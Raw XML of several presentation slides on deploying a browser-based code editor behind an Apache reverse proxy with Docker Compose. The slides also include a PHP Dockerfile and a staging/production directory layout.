                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose -f docker-compose.yml -f  docker-compose.override.yml up -d</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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8" name="Shape 4788"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4789" name="Google Shape;4789;p777"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213825" y="434550"/>
            <a:ext cx="2865900" cy="864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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deploye Online Code Editor using Docker compose</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4790" name="Google Shape;4790;p777"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213825" y="1885575"/>
            <a:ext cx="3010200" cy="330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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Code Server (Visual Studio Code in the Browser)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse Proxy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://editor.domain.com</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4791" name="Google Shape;4791;p777"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7793" l="4833" r="5157" t="3238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3223987" y="53550"/>
            <a:ext cx="5858164" cy="5089949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4795"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4796" name="Google Shape;4796;p778"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5780" l="0" r="0" t="4461"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="315350"/>
            <a:ext cx="9144000" cy="4415621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4800"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4801" name="Google Shape;4801;p779"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="113100"/>
            <a:ext cx="8520600" cy="4839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&lt;IfModule mod_ssl.c&gt;</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&lt;VirtualHost *:443&gt;</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ServerName editor.myschoolio.com</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 DocumentRoot /var/www/html</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SSLEngine on</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SSLCertificateFile /etc/letsencrypt/live/editor.myschoolio.com/fullchain.pem</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SSLCertificateKeyFile /etc/letsencrypt/live/editor.myschoolio.com/privkey.pem</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Include /etc/letsencrypt/options-ssl-apache.conf</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 Preserve the original host header</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ProxyPreserveHost On</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AllowEncodedSlashes NoDecode</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 Standard HTTP Reverse Proxy</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ProxyPass / http://localhost:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1325">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1325">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ nocanon</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ProxyPassReverse / http://localhost:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1325">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1325">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</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 WebSocket Reverse Proxy</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RewriteEngine On</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RewriteCond %{HTTP:Upgrade} =websocket [NC]</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RewriteRule /(.*) ws://localhost:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1325">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1325">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/$1 [P,L]</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RewriteCond %{HTTP:Upgrade} !=websocket [NC]</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RewriteRule /(.*) http://localhost:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1325">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>portno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1325">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/$1 [P,L]</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ErrorLog ${APACHE_LOG_DIR}/editor.myschoolio.com-error.log</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    CustomLog ${APACHE_LOG_DIR}/editor.myschoolio.com-access.log combined</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&lt;/VirtualHost&gt;</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rPr lang="en" sz="1325">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/IfModule&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1325">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="688"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1325">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="688"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1325">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4805"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4806" name="Google Shape;4806;p780"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246450" y="210950"/>
            <a:ext cx="8520600" cy="4752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FROM php:8.1-apache</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Update package list and install necessary dependencies</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RUN apt-get update &amp;&amp; apt-get install -y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wget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unzip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libaio1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libpng-dev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libjpeg-dev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libfreetype6-dev</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Install PHP extensions: PDO-MySQL and GD</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RUN docker-php-ext-configure gd --with-freetype --with-jpeg &amp;&amp;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docker-php-ext-install pdo_mysql gd</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Download and install ionCube Loader</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RUN wget https://downloads.ioncube.com/loader_downloads/ioncube_loaders_lin_x86-64.zip &amp;&amp;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unzip ioncube_loaders_lin_x86-64.zip -d /usr/local &amp;&amp;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rm ioncube_loaders_lin_x86-64.zip</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Configure ionCube for PHP 8.1</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RUN echo "zend_extension=/usr/local/ioncube/ioncube_loader_lin_8.1.so" &gt; /usr/local/etc/php/conf.d/00-ioncube-loader.ini</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Set the working directory</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WORKDIR /var/www/html</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Expose port 80 for Apache</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EXPOSE 80</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 Start Apache in the foreground</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rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CMD ["apachectl", "-D", "FOREGROUND"]</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="440"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1020">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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0" name="Shape 4810"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4811" name="Google Shape;4811;p781"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480650" y="548050"/>
            <a:ext cx="8351700" cy="440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688"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2525">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2enmod proxy</a:t>
            </a:r>
            <a:endParaRPr sz="2525">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="688"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2525">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2enmod proxy_http</a:t>
            </a:r>
            <a:endParaRPr sz="2525">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="688"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2525">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2enmod proxy_wstunnel</a:t>
            </a:r>
            <a:endParaRPr sz="2525">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="688"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2525">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo a2enmod rewrite</a:t>
            </a:r>
            <a:endParaRPr sz="2525">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4815"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4816" name="Google Shape;4816;p782"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="7913100" cy="70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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to create staging and production </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4817" name="Google Shape;4817;p782"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474800" y="1031400"/>
            <a:ext cx="8302800" cy="2733900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production (Customer/Client)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staging  (Developer)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Editor</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4821"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4822" name="Google Shape;4822;p783"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="7913100" cy="70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Directory Structure</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4823" name="Google Shape;4823;p783"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474800" y="1031400"/>
            <a:ext cx="8302800" cy="4112100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production (Customer/Client)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myschoolio_production/index.html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(8081)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staging  (Developer)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myschoolio_staging/index.html (8080)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Editor</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
